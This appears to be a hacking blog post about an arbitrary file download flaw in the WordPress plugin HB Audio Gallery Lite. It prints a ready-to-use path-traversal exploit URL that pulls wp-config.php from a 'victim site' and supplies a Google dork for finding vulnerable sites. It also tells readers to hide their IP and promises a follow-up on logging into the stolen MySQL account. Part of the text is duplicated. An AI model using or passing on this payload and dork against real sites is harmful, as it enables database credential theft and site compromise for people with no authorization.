8:38 PM
Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download
EXPLOIT : /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10
When u Pentest Website Note : You should Hide your IP to Protect yourself !!
Link Tool Hide IP and Tutorial How to Hide IP :
Use dork to help you find vulnerability site just use google or other search to find Vulnerability past on google or other search inurl:/wp-content/plugins/hb-audio-gallery-lite
Pic 1
Example this URLsite i just test vulnerability or not it will show you like Pic 4 you will get wp-config.php
When u Pentest Website Note : You should Hide your IP to Protect yourself !!
Link Tool Hide IP and Tutorial How to Hide IP :
Use dork to help you find vulnerability site just use google or other search to find Vulnerability past on google or other search inurl:/wp-content/plugins/hb-audio-gallery-lite
Pic 1
Example this URLsite i just test vulnerability or not it will show you like Pic 4 you will get wp-config.php
Pic 2
Let's POC :www.victim site.com /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10
when POC is past like this you will get wp-config.php
Pic 4
then open it with notpad you willl get account mysql next tutorial will to show you how to connect
Sorry about my english but i hope you guy understand if you don't understand you comment below Thank<3
Good luck My Brother and Sister !
No comments
Post a Comment